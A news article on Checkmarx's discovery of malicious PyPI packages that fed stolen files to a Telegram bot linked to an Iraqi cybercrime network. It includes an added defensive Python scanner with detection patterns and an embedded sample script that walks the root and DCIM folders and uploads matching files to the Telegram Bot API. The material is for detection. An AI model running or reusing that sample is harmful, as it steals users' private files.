Well-Established Cybercriminal Ecosystem Blooming in Iraq
A malicious Telegram bot is the key to a veritable flourishing garden of nefarious cybercriminal activity, which was discovered via a series of Python packages.
July 15, 2024
A sprawling criminal network has emerged in Iraq, linked to a Telegram bot that dates back to 2022 and contains more than 90,000 messages, mostly in Arabic.
According to researchers at Checkmarx, the bot is the key to a larger, sophisticated cybercriminal ecosystem, including a thriving underground marketplace offering social media manipulation services and financial theft tools, and a suite of malicious PyPI packages that exfiltrate user data.
Malicious PyPI Packages for Data Theft
A series of malicious, Arabic-language Python packages recently surfaced on the Python package repository PyPI, according to Checkmarx, uploaded by a user named "dsfsdfds." On closer examination, the researchers found that the packages contained a malicious script that exfiltrated sensitive user data to a Telegram bot chat.
"The malicious script … begins by scanning the user's file system, focusing on two specific locations: the root folder and the DCIM folder," according to the report, released today. "During this scanning process, the script searches for files with extensions such as .py, .php, and .zip files, as well as photos with .png, .jpg, and .jpeg extensions."
The packages also contained a hardcoded Telegram ID and token, which Checkmarx researchers used to gain direct access to the attacker's Telegram bot, where they discovered "a significant history of activity, with records dating back to at least 2022, long before the malicious packages were released on PyPI."
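The two preceding paragraphs describe the indicators a defender can look for in a package before installing it: a hardcoded Telegram bot token and chat ID, the Bot API endpoint, a walk of the root and DCIM folders, and a filter for the harvested extensions. The following scanner is an added example written for this page, not Checkmarx's tooling or the code from the "dsfsdfds" packages. The token regex assumes the public Telegram Bot API token shape (numeric bot ID, a colon, then a 35-character secret), the sample "package" it scans is constructed inline to mimic the described behaviour (and is written to disk only as text, never imported), and all names and thresholds are the author's own choices.

```python
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Heuristic indicators modelled on the behaviour the article describes.
# The token pattern is an assumption about the Bot API token shape
# (numeric bot id, colon, 35-character secret); tune it for your environment.
INDICATORS = {
    "telegram_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b"),
    "telegram_api": re.compile(r"api\.telegram\.org/bot"),
    "chat_id": re.compile(r"chat_id\s*[=:]\s*['\"]?-?\d{6,}", re.IGNORECASE),
    "dcim_path": re.compile(r"\bDCIM\b"),
    "os_walk": re.compile(r"os\.walk\("),
}
# Three or more of the harvested extensions as string literals on one line.
EXT_LITERAL = re.compile(r"['\"]\.(?:py|php|zip|png|jpe?g)['\"]")
SCANNABLE = {".py", ".cfg", ".toml", ".txt"}


@dataclass(frozen=True)
class Finding:
    path: str
    lineno: int
    kind: str
    excerpt: str


def scan_text(path: str, text: str) -> list[Finding]:
    """Apply every indicator to each line of one file."""
    found = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in INDICATORS.items():
            if pattern.search(line):
                found.append(Finding(path, lineno, kind, line.strip()))
        if len(EXT_LITERAL.findall(line)) >= 3:
            found.append(Finding(path, lineno, "harvest_extensions", line.strip()))
    return found


def scan_tree(root: Path) -> list[Finding]:
    """Walk an extracted sdist or wheel and scan every text-like file."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in SCANNABLE:
            text = path.read_text(encoding="utf-8", errors="ignore")
            findings.extend(scan_text(path.relative_to(root).as_posix(), text))
    return findings


def assess(findings: list[Finding]) -> str:
    """A Telegram sink combined with file harvesting is the pattern described above."""
    kinds = {f.kind for f in findings}
    sink = bool(kinds & {"telegram_token", "telegram_api", "chat_id"})
    harvest = bool(kinds & {"dcim_path", "os_walk", "harvest_extensions"})
    if sink and harvest:
        return "high"
    if sink or harvest:
        return "medium"
    return "low"


def bot_ids(findings: list[Finding]) -> set[str]:
    """The numeric bot id (before the colon) is what an investigator pivots on."""
    ids = set()
    for f in findings:
        if f.kind == "telegram_token":
            match = INDICATORS["telegram_token"].search(f.excerpt)
            ids.add(match.group(0).split(":")[0])
    return ids


# Constructed sample mimicking the described behaviour (hypothetical token and
# chat id). It is only written to disk and scanned, never executed.
MALICIOUS_SAMPLE = '''\
import os, requests
TOKEN = "7123456789:AAHf9Kq2Lm8Pz4Rt6Vw1Xy3Zb5Cd7Ef9Gh0"
CHAT_ID = "-1001234567890"
URL = "https://api.telegram.org/bot" + TOKEN + "/sendDocument"
for base in ("/", "/sdcard/DCIM"):
    for root, _, files in os.walk(base):
        for name in files:
            if name.endswith((".py", ".php", ".zip", ".png", ".jpg", ".jpeg")):
                with open(os.path.join(root, name), "rb") as fh:
                    requests.post(URL, data={"chat_id": CHAT_ID}, files={"document": fh})
'''
BENIGN_SAMPLE = '''\
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''


def build_sample_package() -> Path:
    """Write the constructed package (one malicious, one benign module) to a temp dir."""
    root = Path(tempfile.mkdtemp(prefix="pypi-scan-"))
    pkg = root / "demo_pkg"
    pkg.mkdir()
    (pkg / "__init__.py").write_text(MALICIOUS_SAMPLE)
    (pkg / "utils.py").write_text(BENIGN_SAMPLE)
    return root


if __name__ == "__main__":
    findings = scan_tree(build_sample_package())
    for f in findings:
        print(f"{f.path}:{f.lineno} {f.kind}: {f.excerpt}")
    print("verdict:", assess(findings), "bot ids:", bot_ids(findings))
```

Point `scan_tree` at the directory produced by `pip download <pkg> --no-deps` followed by extraction, and run it before the package is installed: `setup.py` and `__init__.py` execute on install or import, so a review that happens after `pip install` is too late. A token hit on its own only means the package talks to Telegram; it is the combination with a file walk and the extension filter that matches the exfiltration pattern described here.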
Ultimately, the 90,000 messages pointed to an origin in Iraq, with ties to many other bots as well. In all, the researchers concluded, Iraq is home to a previously unknown, thriving cybercriminal enterprise with a raft of illicit services on offer.
"The discovery of the malicious Python packages on PyPI and the subsequent investigation into the Telegram bot have shed light on a sophisticated and widespread cybercriminal operation," the report concluded. "What initially appeared to be an isolated incident of malicious packages turned out to be just the tip of the iceberg, revealing a well-established criminal ecosystem based in Iraq."
The discovery underscores the role that open source software continues to play as an attack vector for compromising enterprise information, the researchers noted, adding that they plan to release further details on the Iraq underground in the coming months.
"As the fight against malicious actors in the open-source ecosystem persists, collaboration and information sharing among the security community will be critical in identifying and thwarting these attacks," they said. "Through collective effort and proactive measures, we can work towards a safer and more secure open-source ecosystem for all."